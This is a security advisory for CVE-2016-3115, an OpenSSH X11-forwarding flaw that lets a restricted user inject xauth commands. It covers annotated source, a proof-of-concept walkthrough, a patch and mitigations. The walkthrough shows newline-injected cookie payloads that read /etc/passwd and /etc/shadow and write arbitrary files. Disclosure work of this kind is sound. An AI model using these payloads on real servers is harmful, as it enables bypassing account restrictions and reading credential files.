来源链接: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
### VuNote
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass
### Overview
Name: openssh
Vendor: OpenBSD
References: * http://www.openssh.com/[1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115
### Description
quote website [1]
>OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
### Summary
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have `X11Forwarding yes` enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files,
information leakage or xauth-connect capabilities. These capabilities can be
leveraged by an authenticated restricted user - e.g. one with the login shell
configured as /bin/false or one with configured forced-commands - to bypass
account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the
logged in user as the sshd already dropped its privileges.
* requires: X11Forwarding yes
* bypasses /bin/false and forced-commands
* OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)
* does not bypass /bin/nologin (as there is special treatment for this)
Capabilities (xauth):
* Xauth
* write file: limited chars, xauthdb format
* read file: limit lines cut at first \s
* infoleak: environment
* connect to other devices (may allow port probing)
see attached PoC, Patch
### Details
// see annotated code below
* server_input_channel_req (serverloop.c)
*- session_input_channel_req:2299 (session.c [2])
*- session_x11_req:2181
* do_exec_pty or do_exec_no_pty
*- do_child
*- do_rc_files (session.c:1335 [2])
Upon receiving an `x11-req` type channel request sshd parses the channel request
parameters `auth_proto` and `auth_data` from the client ssh packet where
`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)
and `auth_data` contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling `execute` on that session, sshd will
call `do_rc_files` which tries to figure out if this is an x11 call by evaluating
if `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND
there is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`
is set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.
Note that `auth_data` nor `auth_proto` was sanitized or validated, it just contains
user-tainted data. Since `xauth` commands are passed via `stdin` and `\n` is a
command-separator to the `xauth` binary, this allows a client to inject arbitrary
`xauth` commands.
Sidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]
This is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth
command injection:
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
### Source
Inline annotations are prefixed with `//#!`
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
static void
do_rc_files(Session *s, const char *shell)
snprintf(cmd, sizeof cmd, "%s -q -",
f = popen(cmd, "w"); //#! run xauth -q -
if (f) {
fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
fprintf(f, "add %s %s %s\n", //#! \n injection
s->auth_display, s->auth_proto,
} else {
fprintf(stderr, "Could not run %s\n",
### Proof of Concept
* install python 2.7.x
* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x
* run `poc.py`
Usage: <host> <port> <username> <password or path_to_privkey>
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
2. run sshd with `X11Forwarding yes` (kali default config)
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
3. `forced-commands` - connect with user1 and display env information
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@host:22
Available commands:
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 1
Changes honored: yes
Changes made: no
Current input: (stdin):3
/usr/bin/xauth: (stdin):2: bad "add" command line
4. `forced-commands` - read `/etc/passwd`
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
5. `forced-commands` - write `/tmp/testfile`
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line
#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
6. `/bin/false` - connect and read `/etc/passwd`
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
Available commands:
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
7. `/bin/false` - initiate outbound X connection to
#> generate .
#> tcpdump
IP <host>.42033 > Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
### Troubleshooting
**Q**: `ImportError: No module named py3compat`
**A**: outdated `paramiko` please upgrade with `pip install --upgrade paramiko`
### Proposed Patch
* Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display`
by replacing all non-printables by spaces. (I know this is kind of ugly ;))
#> ~/openssh-7.2p1# diff -u session.c session.c.patched
--- session.c 2016-02-17 11:32:11.616868923 -0500
+++ session.c.patched 2016-02-17 11:33:33.681596273 -0500
@@ -1327,6 +1327,18 @@
return env;
+char *
+sanitize_non_printable(char *s) {
+ char *ptr = s;
+ while (*ptr != '\0'){
+ if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \n would basically be enough */
+ *ptr = ' ';
+ }
+ ptr++;
+ }
+ return s;
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
@@ -1341,6 +1353,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;
+ sanitize_non_printable(s->display);
+ sanitize_non_printable(s->auth_proto);
+ sanitize_non_printable(s->auth_data);
/* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
if (!s->is_subsystem && options.adm_forced_command == NULL &&
!no_user_rc && options.permit_user_rc &&
### Mitigation / Workaround
* disable x11-forwarding: `sshd_config` set `X11Forwarding no`
* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`
Verified, resolved and released within a few days. very impressive.
Vendor response: see advisory [5]
### References
[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
### Contact